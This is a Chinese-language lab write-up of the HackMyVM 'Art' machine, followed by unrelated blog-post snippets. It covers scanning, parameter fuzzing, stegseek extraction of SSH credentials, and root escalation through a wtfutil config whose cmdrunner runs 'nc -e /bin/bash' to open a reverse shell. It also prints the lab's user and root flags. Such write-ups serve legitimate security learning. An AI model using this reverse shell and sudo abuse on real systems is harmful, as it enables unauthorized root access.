当前位置：首页 > article >正文

HackMyVM-Art

article 2025/6/3 18:37:00

信息搜集

主机发现

┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.43.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 03:00 EDT
Nmap scan report for 192.168.43.1
Host is up (0.0047s latency).
MAC Address: C6:45:66:05:91:88 (Unknown)
Nmap scan report for art (192.168.43.52)
Host is up (0.00031s latency).
MAC Address: 08:00:27:FF:B6:C9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for CET-AL00 (192.168.43.156)
Host is up (0.043s latency).
MAC Address: B2:A8:93:0D:FB:BD (Unknown)
Nmap scan report for DESKTOP-3NRITEO (192.168.43.197)
Host is up (0.00022s latency).
MAC Address: 04:6C:59:BD:33:50 (Intel Corporate)
Nmap scan report for kali (192.168.43.126)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds

端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap --min-rate 10000 -p- 192.168.43.52 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 03:03 EDT
Nmap scan report for art (192.168.43.52)
Host is up (0.00036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FF:B6:C9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds┌──(kali㉿kali)-[~]
└─$ nmap -sS -sV -O -p22,80 192.168.43.52  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 03:03 EDT
Nmap scan report for art (192.168.43.52)
Host is up (0.00030s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
MAC Address: 08:00:27:FF:B6:C9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds

漏洞利用

看一下80端口有什么

在这里插入图片描述

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.43.52
SEE HMV GALLERY!
<br><img src=abc321.jpg><br><img src=jlk19990.jpg><br><img src=ertye.jpg><br><img src=zzxxccvv3.jpg><br>
<!-- Need to solve tag parameter problem. -->

目录扫描，什么都没有

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.43.52 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,txt,php,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.52
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,git,html,txt,php,jpg,png
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 170]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

尝试模糊测试

┌──(root㉿kali)-[~]
└─# ffuf -w /home/kali/SecLists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -u 'http://192.168.43.52/index.php?FUZZ=FUZZ' -fc 403 -fs 170 -s -c
tag
┌──(root㉿kali)-[~]
└─# ffuf -w /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u 'http://192.168.43.52/index.php?tag=FUZZ' -fc 403 -fs 170,70 -c -s
beauty

找到了一个图片，下载下来看看有什么

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.43.52/index.php?tag=beauty
SEE HMV GALLERY!
<br><img src=dsa32.jpg><br>
<!-- Need to solve tag parameter problem. -->
┌──(kali㉿kali)-[~]
└─$ stegseek dsa32.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek[i] Found passphrase: ""
[i] Original filename: "yes.txt".
[i] Extracting to "dsa32.jpg.out".

在这里插入图片描述

权限提升

链接ssh，看一下都有什么

lion@art:~$ ls -la
total 32
drwxr-xr-x 3 lion lion 4096 ago  3  2022 .
drwxr-xr-x 3 root root 4096 ago  3  2022 ..
lrwxrwxrwx 1 lion lion    9 ago  3  2022 .bash_history -> /dev/null                                                             
-rw-r--r-- 1 lion lion  220 ago  3  2022 .bash_logout
-rw-r--r-- 1 lion lion 3526 ago  3  2022 .bashrc
drwxr-xr-x 3 lion lion 4096 ago  3  2022 .local
-rw-r--r-- 1 lion lion  807 ago  3  2022 .profile
-rw------- 1 lion lion   24 ago  3  2022 user.txt
-rw------- 1 lion lion   49 ago  3  2022 .Xauthority
lion@art:~$ sudo -l
Matching Defaults entries for lion on art:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser lion may run the following commands on art:(ALL : ALL) NOPASSWD: /bin/wtfutil
lion@art:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
lion@art:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
lion@art:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
lion:x:1000:1000:lion,,,:/home/lion:/bin/bash

user.txt

lion@art:~$ cat user.txt 
HMVygUmTyvRPWduINKYfmpO

尝试利用wtfutil

在这里插入图片描述

提权

编辑一个a.yml
wtf:grid:columns: [20, 20]rows: [3, 3]refreshInterval: 1mods:uptime:type: cmdrunnerargs: ['-e','/bin/bash','192.168.43.126','1234']cmd: "nc"enabled: trueposition:top: 0left: 0height: 1width: 1refreshInterval: 30sudo -u root /bin/wtfutil --config=a.yml
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.43.126] from (UNKNOWN) [192.168.43.52] 47406
id
uid=0(root) gid=0(root) grupos=0(root)

root.txt

cat /var/opt/root.txt
mZxbPCjEQYOqkNCuyIuTHMV

HackMyVM-Art

信息搜集主机发现 ┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.43.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 03:00 EDT Nmap scan report for 192.168.43.1 Host is up (0.0047s latency). MAC Address: C6:45:66:05:91:88 (Unknown) Nmap scan rep…...

编程日记 2025/6/3 18:37:00

网页前端开发（基础进阶1）

颜色表示方法3种： 1.关键字： color：green； gray red yellow 2.rgb表示法：红，绿，蓝三原色。rgb（r，g，b），r表示红色，g表示绿…...

编程日记 2025/6/2 2:37:20

const ‘不可变’到底是值不变还是地址不变

const的基础规则声明时必须初始化 const a; // ❌ 报错：Missing initializer in const declaration const b 10; // ✅ 正确块级作用域（const 的作用域仅限于声明它的代码块） if (true) {const x 100; } console.log(x); // ❌ 报错…...

编程日记 2025/6/2 2:36:17

如何找到一条适合自己企业的发展之路？

一个创业型的企业，开始就需要面向市场，通过自己的服务或产品，帮助用户解决问题，为客户创造价值，通过为客户创造的价值，出创造一定的的现金流，让企业存活下来！ 企业的运营过程中&…...

编程日记 2025/6/2 2:35:15

Vue-数据监听

数据监听基础信息代码 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><title>数据监听</title><script type"text/javascript" src"../js/vue.js&qu…...

编程日记 2025/6/3 12:40:48

当前用户的Git全局配置情况：git config --global --list

通过config命令可以查询当前用户的全局配置情况。这些配置项定义了 Git 在全局范围内的行为，包括如何处理大文件、SSL 证书验证以及提交时的用户信息。 git config --global --list http.sslVerifyfalse 这个配置项禁用了 SSL 证书验证。这在与自签名证书的 Git 服…...

编程日记 2025/6/3 15:42:28

AI生态警报：MCP协议风险与应对指南（中）——MCP Server运行时安全

作为连接AI模型与外部工具的“USB-C接口”，MCP协议成为AI生态的核心枢纽，其安全风险已从理论威胁转化为实际攻击目标。 AI生态警报：MCP协议风险与应对指南（上）——架构与供应链风险https://blog.csdn.net/WangsuSecur…...

编程日记 2025/6/3 8:37:53

day15 leetcode-hot100-29（链表8）

19. 删除链表的倒数第 N 个结点 - 力扣（LeetCode） 1.暴力法思路 （1）先获取链表的长度L （2）然后再次遍历链表到L-n的位置，直接让该指针的节点指向下下一个即可。 2.哈希表思路 &#xff0…...

编程日记 2025/6/3 6:20:26

DeepSeek 赋能文化遗产数字化修复：AI 重构千年文明密码

目录一、引言二、文化遗产数字化修复概述2.1 文化遗产数字化修复的意义2.2 传统数字化修复方法与局限三、DeepSeek 技术剖析3.1 DeepSeek 技术原理与核心优势3.2 相比其他技术的独特之处四、DeepSeek 在文化遗产数字化修复中的应用4.1 破损文物的智能修复4.2 文化遗产的虚拟…...

编程日记 2025/6/3 15:45:33

MonitorSDK_性能监控（从Web Vital性能指标、PerformanceObserver API和具体代码实现）

性能监控性能指标在实现性能监控前，先了解Web Vitals涉及的常见的性能指标 Web Vitals 是由 Google 推出的网页用户体验衡量指标体系，旨在帮助开发者量化和优化网页在实际用户终端上的性能体验。Web Vitals 强调“以用户为中心”的度量，而不…...

编程日记 2025/6/3 4:42:47

Spring Boot整合JWT实现认证与授权

概述 JSON Web Token (JWT) 是一种开放标准 (RFC 7519)，它定义了一种紧凑且自包含的方式，用于在各方之间安全地传输信息。在Web应用中，JWT常用于身份验证和信息交换。依赖配置首先需要在项目中添加JWT依赖： <!-- JWT依赖…...

编程日记 2025/6/3 3:57:46

在 Linux 系统上连接 GitHub 的方法 (适用2025年)

在2025年，使用 Linux 系统连接 GitHub 的推荐方式是通过 SSH (Secure Shell) 协议进行身份验证。这种方式不仅安全，还能免去每次操作时输入用户名和密码的繁琐。 🛠️ 步骤一：检查并安装 Git 首先，确保你的系统已安装…...

编程日记 2025/6/3 18:32:38

解决matlab两个库文件名冲突的问题

解决matlab两个库文件名冲突的问题 1、删除一个路径的文件（不推荐）2、改变优先级（让不想要的版本shadowed）3、更改文件名添加一个库，发现总是调用另一个库的同名文件，这是由于路径中优先级问题。 which -…...

编程日记 2025/6/3 8:30:35

PHP 垃圾回收机制解析与应用案例

PHP 垃圾回收机制解析与应用案例什么是 PHP 垃圾回收机制？ PHP 的垃圾回收（Garbage Collection, GC）机制是其内存管理的重要组成部分。它的主要职责是管理内存的分配与释放，尤其是处理复杂的循环引用问题，确保 PHP …...

编程日记 2025/6/2 2:24:40

es6 函数解构

对象的解构赋值是内部机制，先找回同名属性，再赋值给对应的变量，真正被赋值的是后者。 let node {type:Identifier,name:foo,loc:{start:{line:1,column:1},end:{line:1,column:4}},method:function(){console.log(method);},range:[0,3] };…...

编程日记 2025/6/3 18:53:42

offset三大家族

以下是关于 offset 三大家族的知识点总结： 1. offsetParent 定义：offsetParent 是距离目标元素最近的已定位（position 不为 static）的祖先元素。特点： 如果父级元素都没有定位，则 offsetParent 为 body。…...

编程日记 2025/6/2 2:22:35

RSTP介绍加实操

简介 STP协议虽然能够解决环路问题，但是收敛速度慢，影响了用户通信质量。如果STP网络的拓扑结构频繁变化，网络也会频繁失去连通性，从而导致用户通信频繁中断。IEEE于2001年发布的802.1w标准定义了快速生成树协议RSTP（R…...

编程日记 2025/6/3 6:42:03

Elasticsearch父子关系解析

引言在复杂业务场景中，数据关联查询是搜索与分析的核心需求。以电商订单、文章评论、客户关系等场景为例，传统关系型数据库通过外键实现的多表关联，在分布式搜索场景下面临性能与扩展性挑战。Elasticsearch通过父子关系（Parent-…...

编程日记 2025/6/3 3:43:59

33、请求处理【源码分析】Servlet API参数解析原理

33、请求处理【源码分析】Servlet API参数解析原理在 Spring Boot 中，请求处理过程中涉及到 **Servlet API 参数解析** 的核心机制，主要依赖于 HandlerMethodArgumentResolver 接口及其相关实现类。以下是其原理的详细分析： --- ### **1. 参…...

编程日记 2025/6/2 2:19:30

基于深度学习的三维图像生成项目开发方案

基于深度学习的三维图像生成项目开发方案一、项目概述本项目旨在开发一个基于生成对抗网络（GAN）的三维图像生成系统，能够从随机噪声中生成高质量的三维体素数据。该系统可应用于医学影像合成、游戏内容生成、材料科学等领域。二、技术架构 #mermaid-svg-JZqC6oWtS9sQ6…...

编程日记 2025/6/2 2:18:29

面试题——计算机网络：HTTP和HTTPS的区别？

HTTP（HyperText Transfer Protocol）：作为互联网上应用最广泛的网络通信协议，HTTP是基于TCP/IP协议族的应用层协议。它采用标准的请求-响应模式进行通信，通过简洁的报文格式（包含请求行、请求头、请求体等&a…...

编程日记 2025/6/3 3:53:06

Flutter 包依赖升级指南：让项目保持最新状态

在 Flutter 开发过程中，依赖项管理是确保项目顺利运行和持续优化的关键环节。依赖项是项目中不可或缺的外部库，它们提供了各种功能，从 UI 组件到数据处理工具，帮助开发者快速构建应用。然而，随着时间的推移&#xff0c…...

编程日记 2025/6/3 14:57:41

LeeCode 98. 验证二叉搜索树

给你一个二叉树的根节点 root ，判断其是否是一个有效的二叉搜索树。有效二叉搜索树定义如下： 节点的左子树只包含小于当前节点的数。节点的右子树只包含大于当前节点的数。所有左子树和右子树自身必须也是二叉搜索树。提示： 树中节…...

编程日记 2025/6/3 4:59:57

JVM类加载高阶实战：从双亲委派到弹性架构的设计进化

前言作为Java开发者，我们都知道JVM的类加载机制遵循"双亲委派"原则。但在实际开发中，特别是在金融支付、插件化架构等场景下，严格遵循这个原则反而会成为系统扩展的桎梏。本文将带你深入理解双亲委派机制的本质，并分享…...

编程日记 2025/6/3 2:19:10

[网页五子棋][用户模块]数据库设计和配置(MyBatis)、约定前后端交互接口、服务器开发

文章目录数据库数据库设计配置 MyBatis1. Spring 配置2. 创建实体类3. 创建 Mapper 接口4. 使用 MyBatis 约定前后端交互接口登录接口注册接口获取用户信息服务器开发loginregistergetUserInfo完整代码数据库数据库设计完成注册登录以及用户分数管理使用数据库来保存上…...

编程日记 2025/6/3 7:35:15

maven编译时跳过test过程

如果代码里有无法在打包环境中测试的部分，则直接运行mvn clean package，因为测试失败，会导致打包失败。目前有两种方式可以跳过测试： 1. mvn clean package -DskipTests，这会跳过执行阶须，但仍会生成测试所…...

编程日记 2025/6/2 2:12:01

threejsPBR材质与纹理贴图

1. PBR材质简介本节课没有具体的代码，就是给大家科普一下PBR材质，所谓PBR就是，基于物理的渲染(physically-based rendering)。 Three.js提供了两个PBR材质相关的APIMeshStandardMaterial和MeshPhysicalMaterial,MeshPhysicalMaterial是Mes…...

编程日记 2025/6/2 2:10:57